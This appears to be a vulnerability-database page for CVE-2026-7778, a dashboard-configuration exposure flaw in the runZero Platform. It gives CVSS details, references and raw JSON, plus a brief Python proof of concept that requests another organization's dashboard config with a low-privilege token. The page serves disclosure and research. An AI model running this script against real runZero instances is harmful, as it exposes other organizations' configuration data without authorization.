Security Vulnerability Report
中文
CVE-2026-7778 CVSS 5.0 MEDIUM

CVE-2026-7778

Published: 2026-05-05 14:16:09
Last Modified: 2026-05-07 15:12:06
Source: 44488dab-36db-4358-99f9-bc116477f914

Description

An issue that could allow a dashboard configuration to be viewed from outside of the authorized organization scope has been resolved. This is an instance of CWE-269: Improper Privilege Management, and has an estimated CVSS score of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0, Medium). This issue was fixed in version v4.0.260416.0 of the runZero Platform.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

runZero Platform < v4.0.260416.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Proof of Concept for CVE-2026-7778 # Demonstrates unauthorized access to dashboard configuration target_url = "https://target-runzero-instance/api/v1/dashboard/config/{target_config_id}" # Attacker uses a low-privilege token obtained from their own account attacker_headers = { "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>", "Accept": "application/json" } print("[*] Attempting to access dashboard configuration outside authorized scope...") response = requests.get(target_url, headers=attacker_headers) if response.status_code == 200: print("[+] Vulnerability Confirmed! Leaked Configuration:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7778", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-05-05T14:16:09.473", "lastModified": "2026-05-07T15:12:06.120", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue that could allow a dashboard configuration to be viewed from outside of the authorized organization scope has been resolved. This is an instance of CWE-269: Improper Privilege Management, and has an estimated CVSS score of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0, Medium). This issue was fixed in version v4.0.260416.0 of the runZero Platform."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://help.runzero.com/docs/release-notes/#402604160", "source": "44488dab-36db-4358-99f9-bc116477f914"}, {"url": "https://www.runzero.com/advisories/runzero-platform-dashboard-configuration-exposure-cve-2026-7778/", "source": "44488dab-36db-4358-99f9-bc116477f914"}]}}